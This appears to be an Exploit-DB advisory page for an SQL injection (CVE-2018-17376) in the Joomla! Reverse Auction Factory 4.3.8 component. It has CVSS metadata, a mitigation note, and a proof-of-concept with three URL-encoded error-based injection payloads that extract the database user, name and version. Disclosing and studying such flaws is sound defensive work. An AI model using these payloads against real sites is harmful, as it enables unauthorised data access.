Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection

vendor:

Reverse Auction Factory

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Reverse Auction Factory

Affected Version From: 4.3.8

Affected Version To: 4.3.8

Patch Exists: NO

Related CWE: CVE-2018-17376

CPE: a:thephpfactory:reverse_auction_factory:4.3.8

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Reverse Auction Factory 4.3.8 – SQL Injection

Joomla! Component Reverse Auction Factory 4.3.8 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'filter_order_Dir', 'cat' and 'filter_letter' parameters in the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged account with access to the database.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/
# Version: 4.3.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17376
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# 2)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
# 
# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d
#  
# 3)
# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
# 
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
#  
# # # #